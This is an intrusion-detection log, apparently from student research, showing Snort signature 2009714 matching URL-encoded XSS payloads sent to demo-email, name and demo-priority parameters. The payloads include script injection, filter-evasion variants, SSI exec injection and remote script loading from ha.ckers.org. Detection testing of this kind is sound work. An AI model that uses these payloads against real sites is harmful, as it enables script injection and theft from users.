# inspectorlog v3.5
#----- Initializing Rules (SNORT) ---------------------
# Rules directory : "/home/kali/Downloads/reglas_javi/snort"
#	Opening SNORT rule file /home/kali/Downloads/reglas_javi/snort/http_uri-sn-20220324.rules... done
#		Rules: read [3749], erroneous [0], URI [384]
#	Opening SNORT rule file /home/kali/Downloads/reglas_javi/snort/http_uri-er-20220224.rules... done
[parse_snortRule] WARNING: Line [4970] exceeds allowed number of PCRE fields
#		Rules: read [6015], erroneous [0], URI [5116]
#----- Statistics (SNORT) ------------------------------
# Read [9764] Snort rules, [5500] http-related, [0] with errors
#----- Analysis results ----------------------------
# Alerts & signatures generated from: /home/kali/Downloads/inspectorlog/inspectorlog -l xss.uri -r /home/kali/Downloads/reglas_javi/snort -t list -o /home/kali/TFG/inspectorlog/snort/web_estatica/owasp/opensource/grabber/xss.clean
Packet [50]	Uri [/web/?demo-email=%3C%3F+echo%28%27%3CSCR%29%27%3B+echo%28%27IPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%27%29%3B+%3F%3E]	Nattacks [1]	Signatures	[2009714]
Packet [51]	Uri [/web/?demo-email=%3C%3F+echo%28%27%3CSCR%29%27%3B+echo%28%27IPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%27%29%3B+%3F%3E]	Nattacks [1]	Signatures	[2009714]
Packet [56]	Uri [/web/?demo-email=%3CHTML%3E%3CBODY%3E+%3C%3Fxml%3Anamespace+prefix%3D%22t%22+ns%3D%22urn%3Aschemas-microsoft-com%3Atime%22%3E+%3C%3Fimport+namespace%3D%22t%22+implementation%3D%22%23default%23time2%22%3E+%3Ct%3Aset+attributeName%3D%22innerHTML%22+to%3D%22XSS%3CSCRIPT+DEFER%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E+%3C%2FBODY%3E%3C%2FHTML%3E]	Nattacks [1]	Signatures	[2009714]
Packet [57]	Uri [/web/?demo-email=%3CHTML%3E%3CBODY%3E+%3C%3Fxml%3Anamespace+prefix%3D%22t%22+ns%3D%22urn%3Aschemas-microsoft-com%3Atime%22%3E+%3C%3Fimport+namespace%3D%22t%22+implementation%3D%22%23default%23time2%22%3E+%3Ct%3Aset+attributeName%3D%22innerHTML%22+to%3D%22XSS%3CSCRIPT+DEFER%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E+%3C%2FBODY%3E%3C%2FHTML%3E]	Nattacks [1]	Signatures	[2009714]
Packet [74]	Uri [/web/?demo-email=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3D%26%7B%7D]	Nattacks [1]	Signatures	[2009714]
Packet [75]	Uri [/web/?demo-email=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3D%26%7B%7D]	Nattacks [1]	Signatures	[2009714]
Packet [76]	Uri [/web/?demo-email=%3CSCRIPT%3Edocument.write%28%22%3CSCRI%22%29%3B%3C%2FSCRIPT%3EPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [77]	Uri [/web/?demo-email=%3CSCRIPT%3Edocument.write%28%22%3CSCRI%22%29%3B%3C%2FSCRIPT%3EPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [78]	Uri [/web/?demo-email=%3C%2FTITLE%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [79]	Uri [/web/?demo-email=%3C%2FTITLE%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [80]	Uri [/web/?demo-email=%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [81]	Uri [/web/?demo-email=%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [84]	Uri [/web/?demo-email=%3CSCRIPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.jpg%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [85]	Uri [/web/?demo-email=%3CSCRIPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.jpg%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [106]	Uri [/web/?demo-email=%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3CSCRIPT+SRC%27%22--%3E%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E%27%22--%3E]	Nattacks [1]	Signatures	[2009714]
Packet [107]	Uri [/web/?demo-email=%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3CSCRIPT+SRC%27%22--%3E%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E%27%22--%3E]	Nattacks [1]	Signatures	[2009714]
Packet [112]	Uri [/web/?demo-email=%3CSCRIPT+%22a%3D%27%3E%27%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [113]	Uri [/web/?demo-email=%3CSCRIPT+%22a%3D%27%3E%27%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [122]	Uri [/web/?demo-email=%3CSCRIPT+a%3D%60%3E%60+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [123]	Uri [/web/?demo-email=%3CSCRIPT+a%3D%60%3E%60+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [124]	Uri [/web/?demo-email=%3CSCRIPT+a%3D%22%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [125]	Uri [/web/?demo-email=%3CSCRIPT+a%3D%22%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [126]	Uri [/web/?demo-email=%3CSCRIPT+%3D%22blah%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [127]	Uri [/web/?demo-email=%3CSCRIPT+%3D%22blah%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [128]	Uri [/web/?demo-email=%3CSCRIPT+a%3D%22blah%22+%27%27+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [129]	Uri [/web/?demo-email=%3CSCRIPT+a%3D%22blah%22+%27%27+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [134]	Uri [/web/?demo-email=%3CSCRIPT+a%3D%22%3E%27%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [135]	Uri [/web/?demo-email=%3CSCRIPT+a%3D%22%3E%27%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [140]	Uri [/web/?demo-email=%3C%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%2F%2F%3C%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [141]	Uri [/web/?demo-email=%3C%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%2F%2F%3C%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [152]	Uri [/web/?demo-email=%3CIMG+%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%22%3E]	Nattacks [1]	Signatures	[2009714]
Packet [153]	Uri [/web/?demo-email=%3CIMG+%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%22%3E]	Nattacks [1]	Signatures	[2009714]
Packet [160]	Uri [/web/?demo-email=%3CSCRIPT%2FXSS+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [161]	Uri [/web/?demo-email=%3CSCRIPT%2FXSS+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [170]	Uri [/web/?demo-email=%3CSCRIPT%3Ea%3D%2FXSS%2F+alert%28a.source%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [171]	Uri [/web/?demo-email=%3CSCRIPT%3Ea%3D%2FXSS%2F+alert%28a.source%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [186]	Uri [/web/?demo-email=%3CMETA+HTTP-EQUIV%3D%22Set-Cookie%22+Content%3D%22USERID%3D%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E]	Nattacks [1]	Signatures	[2009714]
Packet [187]	Uri [/web/?demo-email=%3CMETA+HTTP-EQUIV%3D%22Set-Cookie%22+Content%3D%22USERID%3D%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E]	Nattacks [1]	Signatures	[2009714]
Packet [190]	Uri [/web/?demo-email=%3C%21--%5Bif+gte+IE+4%5D%3E+%3CSCRIPT%3Ealert%28%27XSS%27%29%3B%3C%2FSCRIPT%3E+%3C%21%5Bendif%5D--%3E]	Nattacks [1]	Signatures	[2009714]
Packet [191]	Uri [/web/?demo-email=%3C%21--%5Bif+gte+IE+4%5D%3E+%3CSCRIPT%3Ealert%28%27XSS%27%29%3B%3C%2FSCRIPT%3E+%3C%21%5Bendif%5D--%3E]	Nattacks [1]	Signatures	[2009714]
Packet [200]	Uri [/web/?demo-email=%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [201]	Uri [/web/?demo-email=%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [208]	Uri [/web/?demo-email=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [209]	Uri [/web/?demo-email=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [270]	Uri [/web/?name=%3C%3F+echo%28%27%3CSCR%29%27%3B+echo%28%27IPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%27%29%3B+%3F%3E]	Nattacks [1]	Signatures	[2009714]
Packet [271]	Uri [/web/?name=%3C%3F+echo%28%27%3CSCR%29%27%3B+echo%28%27IPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%27%29%3B+%3F%3E]	Nattacks [1]	Signatures	[2009714]
Packet [276]	Uri [/web/?name=%3CHTML%3E%3CBODY%3E+%3C%3Fxml%3Anamespace+prefix%3D%22t%22+ns%3D%22urn%3Aschemas-microsoft-com%3Atime%22%3E+%3C%3Fimport+namespace%3D%22t%22+implementation%3D%22%23default%23time2%22%3E+%3Ct%3Aset+attributeName%3D%22innerHTML%22+to%3D%22XSS%3CSCRIPT+DEFER%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E+%3C%2FBODY%3E%3C%2FHTML%3E]	Nattacks [1]	Signatures	[2009714]
Packet [277]	Uri [/web/?name=%3CHTML%3E%3CBODY%3E+%3C%3Fxml%3Anamespace+prefix%3D%22t%22+ns%3D%22urn%3Aschemas-microsoft-com%3Atime%22%3E+%3C%3Fimport+namespace%3D%22t%22+implementation%3D%22%23default%23time2%22%3E+%3Ct%3Aset+attributeName%3D%22innerHTML%22+to%3D%22XSS%3CSCRIPT+DEFER%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E+%3C%2FBODY%3E%3C%2FHTML%3E]	Nattacks [1]	Signatures	[2009714]
Packet [294]	Uri [/web/?name=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3D%26%7B%7D]	Nattacks [1]	Signatures	[2009714]
Packet [295]	Uri [/web/?name=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3D%26%7B%7D]	Nattacks [1]	Signatures	[2009714]
Packet [296]	Uri [/web/?name=%3CSCRIPT%3Edocument.write%28%22%3CSCRI%22%29%3B%3C%2FSCRIPT%3EPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [297]	Uri [/web/?name=%3CSCRIPT%3Edocument.write%28%22%3CSCRI%22%29%3B%3C%2FSCRIPT%3EPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [298]	Uri [/web/?name=%3C%2FTITLE%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [299]	Uri [/web/?name=%3C%2FTITLE%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [300]	Uri [/web/?name=%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [301]	Uri [/web/?name=%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [304]	Uri [/web/?name=%3CSCRIPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.jpg%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [305]	Uri [/web/?name=%3CSCRIPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.jpg%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [326]	Uri [/web/?name=%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3CSCRIPT+SRC%27%22--%3E%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E%27%22--%3E]	Nattacks [1]	Signatures	[2009714]
Packet [327]	Uri [/web/?name=%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3CSCRIPT+SRC%27%22--%3E%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E%27%22--%3E]	Nattacks [1]	Signatures	[2009714]
Packet [332]	Uri [/web/?name=%3CSCRIPT+%22a%3D%27%3E%27%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [333]	Uri [/web/?name=%3CSCRIPT+%22a%3D%27%3E%27%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [342]	Uri [/web/?name=%3CSCRIPT+a%3D%60%3E%60+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [343]	Uri [/web/?name=%3CSCRIPT+a%3D%60%3E%60+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [344]	Uri [/web/?name=%3CSCRIPT+a%3D%22%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [345]	Uri [/web/?name=%3CSCRIPT+a%3D%22%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [346]	Uri [/web/?name=%3CSCRIPT+%3D%22blah%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [347]	Uri [/web/?name=%3CSCRIPT+%3D%22blah%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [348]	Uri [/web/?name=%3CSCRIPT+a%3D%22blah%22+%27%27+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [349]	Uri [/web/?name=%3CSCRIPT+a%3D%22blah%22+%27%27+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [354]	Uri [/web/?name=%3CSCRIPT+a%3D%22%3E%27%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [355]	Uri [/web/?name=%3CSCRIPT+a%3D%22%3E%27%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [360]	Uri [/web/?name=%3C%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%2F%2F%3C%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [361]	Uri [/web/?name=%3C%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%2F%2F%3C%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [372]	Uri [/web/?name=%3CIMG+%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%22%3E]	Nattacks [1]	Signatures	[2009714]
Packet [373]	Uri [/web/?name=%3CIMG+%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%22%3E]	Nattacks [1]	Signatures	[2009714]
Packet [380]	Uri [/web/?name=%3CSCRIPT%2FXSS+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [381]	Uri [/web/?name=%3CSCRIPT%2FXSS+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [390]	Uri [/web/?name=%3CSCRIPT%3Ea%3D%2FXSS%2F+alert%28a.source%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [391]	Uri [/web/?name=%3CSCRIPT%3Ea%3D%2FXSS%2F+alert%28a.source%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [406]	Uri [/web/?name=%3CMETA+HTTP-EQUIV%3D%22Set-Cookie%22+Content%3D%22USERID%3D%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E]	Nattacks [1]	Signatures	[2009714]
Packet [407]	Uri [/web/?name=%3CMETA+HTTP-EQUIV%3D%22Set-Cookie%22+Content%3D%22USERID%3D%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E]	Nattacks [1]	Signatures	[2009714]
Packet [410]	Uri [/web/?name=%3C%21--%5Bif+gte+IE+4%5D%3E+%3CSCRIPT%3Ealert%28%27XSS%27%29%3B%3C%2FSCRIPT%3E+%3C%21%5Bendif%5D--%3E]	Nattacks [1]	Signatures	[2009714]
Packet [411]	Uri [/web/?name=%3C%21--%5Bif+gte+IE+4%5D%3E+%3CSCRIPT%3Ealert%28%27XSS%27%29%3B%3C%2FSCRIPT%3E+%3C%21%5Bendif%5D--%3E]	Nattacks [1]	Signatures	[2009714]
Packet [420]	Uri [/web/?name=%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [421]	Uri [/web/?name=%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [428]	Uri [/web/?name=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [429]	Uri [/web/?name=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [490]	Uri [/web/?demo-priority=%3C%3F+echo%28%27%3CSCR%29%27%3B+echo%28%27IPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%27%29%3B+%3F%3E]	Nattacks [1]	Signatures	[2009714]
Packet [491]	Uri [/web/?demo-priority=%3C%3F+echo%28%27%3CSCR%29%27%3B+echo%28%27IPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%27%29%3B+%3F%3E]	Nattacks [1]	Signatures	[2009714]
Packet [496]	Uri [/web/?demo-priority=%3CHTML%3E%3CBODY%3E+%3C%3Fxml%3Anamespace+prefix%3D%22t%22+ns%3D%22urn%3Aschemas-microsoft-com%3Atime%22%3E+%3C%3Fimport+namespace%3D%22t%22+implementation%3D%22%23default%23time2%22%3E+%3Ct%3Aset+attributeName%3D%22innerHTML%22+to%3D%22XSS%3CSCRIPT+DEFER%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E+%3C%2FBODY%3E%3C%2FHTML%3E]	Nattacks [1]	Signatures	[2009714]
Packet [497]	Uri [/web/?demo-priority=%3CHTML%3E%3CBODY%3E+%3C%3Fxml%3Anamespace+prefix%3D%22t%22+ns%3D%22urn%3Aschemas-microsoft-com%3Atime%22%3E+%3C%3Fimport+namespace%3D%22t%22+implementation%3D%22%23default%23time2%22%3E+%3Ct%3Aset+attributeName%3D%22innerHTML%22+to%3D%22XSS%3CSCRIPT+DEFER%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E+%3C%2FBODY%3E%3C%2FHTML%3E]	Nattacks [1]	Signatures	[2009714]
Packet [514]	Uri [/web/?demo-priority=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3D%26%7B%7D]	Nattacks [1]	Signatures	[2009714]
Packet [515]	Uri [/web/?demo-priority=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3D%26%7B%7D]	Nattacks [1]	Signatures	[2009714]
Packet [516]	Uri [/web/?demo-priority=%3CSCRIPT%3Edocument.write%28%22%3CSCRI%22%29%3B%3C%2FSCRIPT%3EPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [517]	Uri [/web/?demo-priority=%3CSCRIPT%3Edocument.write%28%22%3CSCRI%22%29%3B%3C%2FSCRIPT%3EPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [518]	Uri [/web/?demo-priority=%3C%2FTITLE%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [519]	Uri [/web/?demo-priority=%3C%2FTITLE%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [520]	Uri [/web/?demo-priority=%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [521]	Uri [/web/?demo-priority=%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [524]	Uri [/web/?demo-priority=%3CSCRIPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.jpg%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [525]	Uri [/web/?demo-priority=%3CSCRIPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.jpg%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [546]	Uri [/web/?demo-priority=%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3CSCRIPT+SRC%27%22--%3E%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E%27%22--%3E]	Nattacks [1]	Signatures	[2009714]
Packet [547]	Uri [/web/?demo-priority=%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3CSCRIPT+SRC%27%22--%3E%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E%27%22--%3E]	Nattacks [1]	Signatures	[2009714]
Packet [552]	Uri [/web/?demo-priority=%3CSCRIPT+%22a%3D%27%3E%27%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [553]	Uri [/web/?demo-priority=%3CSCRIPT+%22a%3D%27%3E%27%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
